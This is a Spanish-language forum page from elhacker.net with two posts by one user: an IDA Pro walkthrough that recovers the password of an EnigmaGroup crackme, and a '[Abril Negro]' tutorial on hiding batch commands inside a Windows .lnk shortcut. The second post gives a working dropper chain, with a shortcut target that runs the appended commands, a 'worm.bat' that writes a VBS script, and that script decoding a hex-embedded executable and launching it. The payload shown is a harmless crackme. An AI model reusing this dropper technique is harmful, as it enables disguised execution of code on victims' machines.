elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13
1  Programación / Ingeniería Inversa / Resolviendo El Crackme 3 De EnigmaGroup Con IDA-Pro en: 6 Mayo 2017, 05:10
Anteriormente había dicho que no haría tutorial de el crackme 3 de EnigmaGroup pero como trato de aprender IDA are una excepción y resolveré el crackme con IDA-Pro.

bueno si no tienen el crackme lo pueden descargar desde su pagina oficial esta:

https://www.enigmagroup.org/pages/cracking

ahora ya que descargaron el crackme pasaremos abrirlo con IDA, pero una cosa muy importante antes de intentar crackear un programa con IDA deben de saber si el programa o crackme es de 32 o 64 bits.

una solución para saber si el crackme es de 32 o 64 bit es abrirlo con el RDG Detector, así que ami al abrirlo con el me sale la siguiente imagen



y como ven donde esta marcado de rojo dice que es de 32 bits, asi que al abrirlo con IDA lo abriremos con IDA 32 bits que es esta.



para los que no saben IDA te instala 2 versiones por eso es muy importante saber que versión es el programa que queremos reversear.

A continuación nos aparecerá una pantalla la cual daremos clic en New



acto seguido ubicaremos el crackme 3 de enigma group, el cual yo lo tengo en la carpeta descargas



después damos clic en abrir y se abrirá la siguiente ventana donde seleccionamos la primera opción y damos clic en OK



bueno ya con esto tendremos el crackme abierto y listo para crackear así que primero buscaremos en las apis que utiliza el crackme para comparar los seriales y para eso nos iremos ala pestaña Imports y nos muestra lo siguiente



Como ven utiliza la misma api que en los crackmes anteriores.

bueno una cosa muy importante no se asusten ya que IDA es mas extenso y laborioso que ollydbg, ya que tiene mas instrucciones pero poco a poco iremos aprendiendo ya que yo todavía no lo domino y una de las cosas que extraño de el ollydbg que no distingo las instrucciones de otras ya que en el desensamblado que mas adelante les presentare, todas las instrucciones tienen el mismo color y no se distinguen a simple vista tengo que seleccionarlas y para eso ando fijando mucho la vista en fin ojala en versiones futuras mejoren eso.

ahora para no andar buscando en el desensamblado la api  __vbaVarTstEq haremos lo siguiente, nos iremos a la pestaña IDA View-A  que es la que nos muestra el desensamblado del programa



y como verán es muy distinto a el ollydbg pero como dije no se asusten que todo tiene remedio, bueno ya que estamos aqui nos iremos al icono siguiente



también pueden dar clic en la pestaña Search y buscar la opción Text la cual tiene el mismo icono que seleccionamos.

a continuación muestra la siguiente ventana



y escribimos el nombre de la api que deseamos encontrar y marcamos las mismas instrucciones y al ultimo presionamos OK

después de esto se abrirá una nueva pestaña donde nos muestra las direcciones donde se utiliza dicha api, así que yo ubique el call donde se hacen las comparaciones de las cadenas el cual para eso fui analizando cada resultado que me dio la búsqueda y es este



para irnos a esa dirección solo damos clic sobre el y nos redirige hasta esta ubicación



Asi que ya tenemos ubicado donde compara las string, asi que para eso pondremos un break-point y tracearemos con F7 igual que ollydbg y para eso solo damos clic al circulo azul de esa linea hasta que se haga rojo y nos marque la linea asi



y ahora pasaremos a ejecutar la aplicación con F9 y si les aparece la siguiente ventana seleccionamos la siguiente opción



Damos OK y por ultimo volvemos a presionar F9

Ahora si nos aparece la ventana del crackme y así que ingresaremos la contraseña que sea, yo ingresare "123456" y presionamos el botón submit



al presionar el botón el programa se detiene justo en el break-point que pusimos este



ahora presionaremos F7 para ingresar en el CALL e ir revisando la pila o stack

Nota: para ir revisando que es lo que se encuentra en el stack iremos dando clic sobre las instrucciones que digan Debug como estas



y el contenido es mostrado en la sección del DUMP

Bueno asi que al tracear con F7 e llegado a la siguiente sección



y al pararme en esta linea reviso el stack o pila y veo que me muestra lo siguiente



y presiono sobre la primera y me muestra lo siguiente en el Dump



ahora presiono la segunda



y guala la clave es "Debug54321" y al ingresar esa clave en el crackme me muestra lo siguiente



Bueno eso es todo amigos espero les haya gustado

Saludos Flamer
2  Programación / Scripting / [Abril Negro] Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk en: 6 Abril 2017, 02:11
Este tema lo publique en mi blog y ahora se los traigo aqui para el abril negro

Ase mucho en mis principios uní un archivo lnk con un exe este era ejecutable desde el lnk, asiendo doble clic sobre el y ahorita que me acuerdo yo en ese entonces usaba el comando debug del antiguo símbolo del sistema para recrear el ejecutable.

trate este tema en el siguiente hilo

https://foro.elhacker.net/analisis_y_diseno_de_malware/unir_autorun_y_exe-t271077.10.html

en el un usuario me tomo a locura lo que estaba diciendo eso fue 2009 pero yo cuando había hecho esos experimentos por llamarlos así hacia mas años, aun no recuerdo si seria en el 2007 o 2006 y como dije usaba el comando debug, yo nunca dije en el foro como lo hice hasta ahora lo explico.

primeramente crearemos un acceso directo al símbolo del sistema en el escritorio, no explicare como crearlo creo que ya tienen las bases suficientes para saber.

 ya que lo tengan creado daremos clic derecho sobre el y daremos clic en propiedades y en el cuadro de texto de destino que es este:



pondremos lo siguiente

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

y ahora abriremos el bloc de notas y dentro de el pondremos los comandos de nuestro bat, yo pondré estos



OJO= fíjense que deje un espacio de 3 lineas y después puse los comandos pueden ser 2 o una, esto es para que no se mezcle con los bites del lnk.

ahora pasaremos a aguardarlo, yo le pondré 96.txt, ya que no es necesario que lleve la extensión bat

ya que tenemos el archivo lnk y los comandos que irán debajo del lnk pasaremos a juntar los, para eso abriremos el símbolo del sistema y nos fijamos en la carpeta del escritorio y teclamos lo siguiente

Nota: mi archivo lnk tiene por nombre "6.lnk" y el archivo que lleva los comandos se llama "96.txt"

copy /b 6.lnk+96.txt w.lnk

nos que daría un archivo llamado "w.lnk", que al ejecutarlo ejecuta los comandos que tenia el archivo 96.txt.

creo que ya tienen una idea de como seguir, así que crearemos un bat que genere un archivo vbs, el cual generara un exe así que el código del bat seria este

Código
  1.  
  2. @echo off
  3. echo option explicit                                           >worm.vbs
  4. echo Dim x,objsystem,file,i,f,largo,bit,bytes,shell            >>worm.vbs  
  5. echo Set objsystem = CreateObject("Scripting.FileSystemObject")>>worm.vbs
  6. echo set shell = createobject("wscript.shell")                 >>worm.vbs
  7. echo Set file = objsystem.getFile("w.lnk")                     >>worm.vbs  
  8. echo largo=file.size                                           >>worm.vbs
  9. echo Set f = file.OpenAsTextStream()                           >>worm.vbs  
  10. echo for i=1 to largo                                          >>worm.vbs
  11. echo     bytes = bytes + f.read(1)                             >>worm.vbs  
  12. echo next                                                      >>worm.vbs
  13. echo f.close                                                   >>worm.vbs
  14. echo bit=split(bytes,"==codingvbs==")                          >>worm.vbs  
  15. echo set file = objsystem.createtextfile("Crackme1.exe")       >>worm.vbs
  16. echo for x=1 to len(bit(2)) step 2                             >>worm.vbs
  17. echo    bytes = mid(bit(2),x,2)                                >>worm.vbs
  18. echo    file.write(chr("&H" + bytes))                          >>worm.vbs
  19. echo next                                                      >>worm.vbs
  20. echo file.close                                                >>worm.vbs
  21. echo wscript.sleep 2000                                        >>worm.vbs
  22. echo shell.run "Crackme1.exe",1                                >>worm.vbs
  23. wscript.exe worm.vbs
  24.  

al bat lo llamaremos "comandos.bat", ahora crearemos un archivo que contendra los bites del exe en valores hexa decimales, al cual llamaremos "code.txt" y contendrá lo siguiente

Código
  1. ==codingvbs==4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000008F8AF9DBCBEB9788CBEB9788CBEB978848F79988CAEB9788A2F49E88CAEB978822F49A88CAEB978852696368CBEB97880000000000000000504500004C0103007180B7430000000000000000E0000F010B01060000200000002000000000000008120000001000000030000000004000001000000010000004000000010000000400000000000000005000000010000044DF00000200000000001000001000000000100000100000000000001000000000000000000000004426000028000000004000001406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280200002000000000100000A80000000000000000000000000000000000000000000000000000002E746578740000008C190000001000000020000000100000000000000000000000000000200000602E64617461000000040A0000003000000010000000300000000000000000000000000000400000C02E727372630000001406000000400000001000000040000000000000000000000000000040000040C52C25411000000000000000000000004D535642564D36302E444C4C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FCB149738D69497373104A734E624973D568497324734773E14B3C7302624973A7663C732C453C73E3423C73292F48739A6249739A63497364B34973AF443C736FD83B7378B73B738A69497385E33C7309B449737C6747735B4E3C731D6649734E6349737F9D4A73A1B24973CE624973CE63497309644873026349733D5D49733EDE3A73CA164A73DC9D4A7336B14973EA204973BAB44973350F4973FE473C73D7503C73000000001500100002234000000000000A234000C0104000000000000100000001000000DA224000000000007DC39425AD49B25405000800E423400000000000EB23400005000800E324400000000000EA24400005000800F425400000000000FB2540000000000000000000FF253C104000FF2558104000FF2564104000FF2530104000FF251C104000FF256C104000FF250C104000FF257C104000FF2534104000FF2578104000FF2570104000FF2560104000FF2548104000FF255C104000FF2510104000FF2504104000FF258C104000FF2500104000FF2598104000FF2568104000FF2538104000FF2550104000FF2594104000FF2590104000FF2544104000FF2508104000FF2584104000FF252C104000FF2514104000FF2520104000FF25A0104000FF259C104000FF2518104000FF2528104000FF2574104000FF2524104000FF2588104000FF2554104000FF2540104000FF254C104000FF2580104000000068F4164000E8EEFFFFFF000000000000300000004000000000000000A1B68322BCF5C74EA7E4A3927EB7E3510000000000000100000000000000000050726F796563746F310000000000000000000000FFCC310003FE22228A455D81448B4E885B15F0513142E3E915F7541E4B93B8F05E7BD708073A4FAD339966CF11B70C00AA0060D393000000000000000000000000000000000000000000000000000000000000000000000000E803000062030000000500466F726D31000D011D002020202020437261636B6D65202337202020506F722020466C616D6572001901004200220123060300006C740000FE0200000000010001002040000001000400E8020000160000002800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000240500466F726D310026002700352D000000B3010000880E0000710700004603FF011C0000000106004672616D653100030578007800A70D9F06120000FF0135000000020A007478745F53657269616C000204F0006801C70B77010B0F00496E677265736120456C20436F6465001202002402FF032B000000030800436F6D6D616E6431000401090056657269666963617200044803380417077701110100FF02020400000007000000DC1E400050000000FE22228A455D81448B4E885B15F0513100000000000000000000000000000000000000009001000000000000000000000000000000000000000000004104000000000000581240004C00000056423521F01F56423645532E444C4C00000000002A000000000000000000000000000A000A0C000009040000000000008C1740001CF0300000FFFFFF080000000100000001000000E9000000A41640009C1640001412400078000000810000008B0000008C000000000000000000000000000000000000004B657947656E6D650050726F796563746F31000050726F796563746F31000000F4010000E41C400000000000E021400040264000FC0900000830400016114000003040002A005C00410043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C0046006C0061006D00650072005C004D0069007300200064006F00630075006D0065006E0074006F0073005C004800610063006B0069006E0067005C0043007200610063006B0069006E0067005C004D0069007300200043007200610063006B006D00650073005C0043007200610063006B006D006500200037005C00500072006F0079006500630074006F0031002E0076006200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1640000100000001000000E41C4000000000003C214000FFFFFFFF00000000381D40000830400001000000401A4000000000000000000000000000401A400001000000A01D400000000000441A4000010000004C1A400000000000481A4000040000004C1A40000400B70168006C00EC1A4000F032400000000000A0DA200000000000B01D4000C01D4000400018003C000000D01D4000020003000000000000000000FC1A400050CF2000E01D4000020003004000110040000000681E4000030003000000000000000000741B400060CF2000781E40000300030040000D0044000000841E4000010003000000000000000000D01B400070CF2000941E40000100030040001F00480000009C1E4000FFFFFFFF00000000000000001C1C400080CF2000AC1E4000FFFFFFFFD21C4000DF1C4000B81C4000C51C4000000000004C1A4000C8194000EE114000F4114000FA11400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000741A4000C8194000EE114000F4114000FA114000B01C400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1A4000C8194000EE114000F4114000FA1140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C41A4000C8194000EE114000F4114000FA114000000000000000000000000000000000000000000000000000BD1C4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000816C24043F000000E933050000816C240447000000E976060000816C2404FFFF0000E949070000816C2404FFFF0000E94C080000000000002C3040007C214000FFFFFFFF000000001C304000988DAE1D6306F14EABE1CAAE39F6073E0A00010001000100381D4000000000000000000000000000841D4000090400000A0C00000000000002000000C8194000FFFFFFFF201F40000000000000000000000000007C1D400005000000681D4000FFFF0000838001000000000073007400650069006E002900101F40001C1F4000466F726D3100000050726F796563746F3100000042E3E915F7541E4B93B8F05E7BD7080757CC2B8E8DA552469C17B77ECC47F6FCFE22228A455D81448B4E885B15F0513144E923EC7903FB479066AA7CD42C4AF7E24EAD339966CF11B70C00AA0060D3937478745F53657269616C00002E3DFBFCFAA06810A73808002B3371B5433A5C4172636869766F732064652070726F6772616D615C4D6963726F736F66742056697375616C2053747564696F5C564239385C5642362E4F4C420000000056420000EC1D4000000000000600000009000000FC1D40003C1E4000D03240000000000000000000A8161C00F24EAD339966CF11B70C00AA0060D393436F6D6D616E643100000000EA4EAD339966CF11B70C00AA0060D3934672616D653100003A4FAD339966CF11B70C00AA0060D393466F726D00000000090000006B65726E656C333200000000120000004973446562756767657250726573656E74000000B81E4000C81E400000000400D43240000000000000000000A1DC3240000BC07402FFE068DC1E4000B8A0114000FFD0FFE0000000436F72726563746F000000004D616C000C0054000000000000000000E14EAD339966CF11B70C00AA0060D393F14EAD339966CF11B70C00AA0060D3937200000043006F00720072006500630074006F002E002E002E002E00460065006C0069007300690064006100640065007300200041006D00690067006F002000410068006F00720061002000500072006F006700720061006D006100200045006C0020004B0065007900670065006E002E002E002E0000001000000043006F00720072006500630074006F000000000022000000530065007200690061006C00200049006E0063006F00720072006500630074006F0000000A0000004500720072006F0072000000564241362E444C4C000000005F5F766261467265655661724C697374000000005F5F766261566172447570005F5F7662614F626A53657400000000005F5F76626153657453797374656D4572726F72005F5F7662614578697450726F630000005F5F766261467265654F626A000000005F5F76626146726565537472000000005F5F76626148726573756C74436865636B4F626A000000005F5F766261493453747200005F5F7662614F6E4572726F72000000005F5F766261467049340000003C2140000000000000000000000000000000000000000000F4204000182140000000F906FFFF00000000000002000360D42040000000000000000000000000001E0000000000FD06FFFF00000000000003000360D42040000000000000000000000000001E00000000000000C8194000FFFFFFFF000000000200000000000000E020400000000000D8204000D4204000D4204000000000000000000000000000540000000400000000000000E41C4000FFFFFFFF00000000D4204000000000000000000000000000FFFFFFFF00000000401E4000D01D4000E0324000401E4000681E4000E4324000401E4000841E4000E8324000401E40009C1E4000EC324000CCCCCCCCCCCCCCCCCCCCCCCCE9E9E9E9CCCCCCCCCCCCCCCCCCCCCCCC558BEC83EC14681611400064A100000000506489250000000083EC205356578965ECC745F0A81040008B75088BC683E0018945F483E6FE89750833DB895DF88B0E56FF5104895DE0895DDC66837E38FF750FDD05D0104000FF15881040008946346A01FF15241040008B1656FF9200030000508D45DC50FF15281040008BF88B0F8D55E05257FF91A0000000DBE23BC37D1268A0000000682C1F40005750FF15181040008B45E050FF15741040008946348D4DE0FF159C1040008D4DDCFF15A01040008B463499B911000000F7F989563483FA0275148B1656FF92F80600003BC37D2968F8060000EB158B75088B0656FF90FC06000085C07D1268FC06000068C01D40005650FF1518104000FF15201040009B681E234000EB138D4DE0FF159C1040008D4DDCFF15A0104000C3C38B45088B0850FF51088B45F48B4DE464890D000000005F5E5B8BE55DC20400909090558BEC83EC0C681611400064A100000000506489250000000083EC185356578965F4C745F8D81040008B75088BC683E0018945FC83E6FE568975088B0EFF510433DB895DE866895E38E866FBFFFF8BF8FF15141040003BFB740666C74638FFFF8B1656FF9204030000508D45E850FF15281040008BF053568B0EFF918C0000003BC3DBE27D12688C000000683C1F40005650FF15181040008D4DE8FF15A0104000895DFC68F6234000EB0A8D4DE8FF15A0104000C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8E810400033F68975FC8B4508508B08FF51048B3D84104000B904000280894DB4B80A000000894DC4BB080000008975BC8975AC89758C8D558C8D4DCC8975DC8975CC89759C8945AC8945BCC74594C81F4000895D8CFFD78D559C8D4DDCC745A4501F4000895D9CFFD78D55AC8D45BC528D4DCC50518D55DC5652FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146807254000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC2040090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8F810400033F68975FC8B4508508B08FF5104B9040002808975DC8975CC8975BC8975AC89759C89758C8B3584104000894DB4B80A000000894DC4BF080000008D558C8D4DCC8945AC8945BCC7459408204000897D8CFFD68D559C8D4DDCC745A4E01F4000897D9CFFD68D55AC8D45BC528D4DCC50518D55DC6A1052FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146818264000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909E9E9E9E6C260000FFFFFFFFFFFFFFFF14270000001000000000000000000000000000000000000000000000222700002C2700003A2700004E2700005E2700006C270000822700009A270000AA270000BA270000CA27000053020080D8270000EA270000FC2700000628000014280000282800003A280000482800005E28000068280000842800009A280000A8280000BA280000CE280000D8280000EA280000FC2800000A2900001C290000640000802A29000038290000442900004E29000058290000622900006C2900007C290000000000004D535642564D36302E444C4C000000005F4349636F73000000005F61646A5F667074616E000000005F5F766261467265655661724C697374000000005F61646A5F666469765F6D36340000005F61646A5F667072656D310000005F5F76626153657453797374656D4572726F720000005F5F76626148726573756C74436865636B4F626A000000005F61646A5F666469765F6D33320000005F5F7662614578697450726F630000005F5F7662614F6E4572726F72000000005F5F7662614F626A5365740000005F61646A5F666469765F6D313669000000005F61646A5F66646976725F6D3136690000005F434973696E000000005F5F76626143686B73746B0000004556454E545F53494E4B5F416464526566000000446C6C46756E6374696F6E43616C6C0000005F61646A5F66706174616E0000004556454E545F53494E4B5F52656C65617365000000005F4349737172740000004556454E545F53494E4B5F5175657279496E746572666163650000005F5F76626145786365707448616E646C6572000000005F61646A5F667072656D000000005F61646A5F66646976725F6D3634000000005F5F7662614650457863657074696F6E000000005F43496C6F67000000005F61646A5F666469765F6D333269000000005F61646A5F66646976725F6D3332690000005F5F7662614934537472000000005F61646A5F66646976725F6D3332000000005F61646A5F666469765F720000005F5F7662615661724475700000005F5F766261467049340000005F43496174616E0000005F616C6C6D756C0000005F434974616E000000005F4349657870000000005F5F76626146726565537472000000005F5F766261467265654F626A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000